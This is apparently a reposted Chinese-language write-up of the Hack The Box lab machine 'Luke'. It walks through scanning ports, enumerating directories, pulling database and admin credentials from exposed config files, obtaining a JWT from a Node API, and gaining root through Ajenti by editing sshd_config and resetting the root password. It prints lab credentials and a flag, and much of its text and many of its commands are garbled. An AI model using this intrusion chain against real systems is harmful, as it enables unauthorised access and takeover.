您好,登錄后才能下訂單哦!
這篇文章將為大家詳細講解有關如何進行HTB-Luke實戰,文章內容質量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關知識有一定的了解。
信息收集
打開10.10.10.137 發現就?個靜態???般我習慣先看?下源碼發現是?個靜態???了
Bootstrap 4
端口測試
21/tcp ftp
22/tcp ssh
80/tcp http
3000/tcp ppp
8000/tcp http-alt
1. 10.10.10.137:8000 ?個Ajenti登陸??
2. 10.10.10.137:3000返回
{"success":false,"message":"Auth token is not supplied"}
目錄遍歷
習慣?dirsearch.py 分別對80、3000進??錄遍歷
80端?發現
[] - B - /.ht_wsr.txt [] - B - /.htaccess-dev [] - B - /.htaccess-local [] - B - /.hta [] - B - /.htaccess-marco [] - B - /.htaccess.bak1 [] - B - /.htaccess.BAK [] - B - /.htaccess.old [] - B - /.htaccessOLD [] - B - /.htaccess.orig[::] - B - /.htaccess_orig [] - B - /.htaccess.sample [] - B - /.htaccess.txt [] - B - /.htaccess_sc [] - B - /.htaccessBAK [] - B - /.htaccess_extra [] - B - /.htaccess.save [] - B - /.htpasswd-old [] - B - /.htaccess~ [] - B - /.htpasswds [] - B - /.htpasswd_test [] - B - /.htaccessOLD2 [] - B - /.htgroup [] - B - /.htusers [] - B - /config.php [] - B - /css -> http: [] - KB - /index.html [] - B - /js -> http: [] - KB - /login.php [] - B - /management [] - B - /management/ [] - B - /member -> http: [] - KB - /package.json [] - KB - /README.md
其中 /management 和 login.php 也是?個登陸??? /config.php 包括了mysql賬號密碼
$dbHost = ; $dbUsername = ; $dbPassword = ; $db = ; $conn = mysqli($dbHost, $dbUsername, $dbPassword,$db) (. $conn -> error);
3000端?發現
[::] Starting: [::] - B - /login [::] - B - /Login [::] - B - [::] - B - [::] - B - /users [::] - B - /users/admin [::] - B - 其中 /login 返回 , users 也是返回 {:,:}
整合信息
三個登陸??
10.10.10.137:8000、10.10.10.137/login.php、10.10.10.137/management
?個mysql賬號密碼root/Zk6heYCyv6ZE9Xcg
10.10.10.137:3000返回信息
{:,:}
10.10.10.137:3000/login返回
"please auth"
具體分析
突破?在
在 "Auth token is not supplied"
Google?下發現是jwt認證失敗的?個返回信息因此推測應該構造認證信息post到
10.10.10.137:3000然后獲取到?戶憑證接著?這個?戶憑證去請求
10.10.10.137:3000/users。
這?post的?戶信息?概就是上?的mysql賬戶密碼因為只有這?個可以?了?且這個賬戶信息嘗試
登陸在?個登陸??以及mysql服務端均沒有成功。
使?curl
curl -s -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' --data '{:,:}'
回顯信息
Error SyntaxError: Unexpected token r in JSON at position 11    at JSON.parse (<anonymous>)    at parse (/nodeapp/node_modules/body-parser/lib/types/json.js:89:19)    at /nodeapp/node_modules/body-parser/lib/read.js:121:18    at invokeCallback (/nodeapp/node_modules/raw-body/index.js:224:16)    at done (/nodeapp/node_modules/raw-body/index.js:213:7)    at IncomingMessage.onEnd (/nodeapp/node_modules/rawbody/index.js:273:7)    at IncomingMessage.emit (events.js:202:15)    at endReadableNT (_stream_readable.js:1132:12)    at processTicksAndRejections (internal/process/next_tick.js:76:17)
不知道是什么原因估計是curl哪?構造錯了但是可以確定的是思路是對的換?postman發送json
請求
獲取到admin的
token
3
?這個token請求/users和/users/{user}
-H -H https://10.10.10.137:3000/users
獲取到
[{:,:,:}, {:,:,:}, {:,:,:}, {:,:,:}] {:,:}% {:,:}% {:,:}% {:,:
登陸到http://10.10.10.137/management訪問http://10.10.10.137/management/config.json
獲取到root/KpMasng6S5EtTy9Z的賬戶信息最后登陸到
10
flag:8448343028fadde1e2a1b0a44d01e650
提權
直接?root/KpMasng6S5EtTy9Z登陸ssh不?說明這只是web的賬號。但是ajenti服務是具有root權
限的也說明可以任意操作了。
?File Manager翻了?下配置?件可以直接找到ssh的配置?件/etc/sshd_config并且有編輯的權限。
那么修改配置項
PermitRootLogin yes
重新啟動ssh服務再試?下登陸ssh發現還是不?可能root
密碼并不是web賬戶密碼這?有Users打開并直接重置root密碼不需要舊密碼重置
ssh登陸
關于如何進行HTB-Luke實戰就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。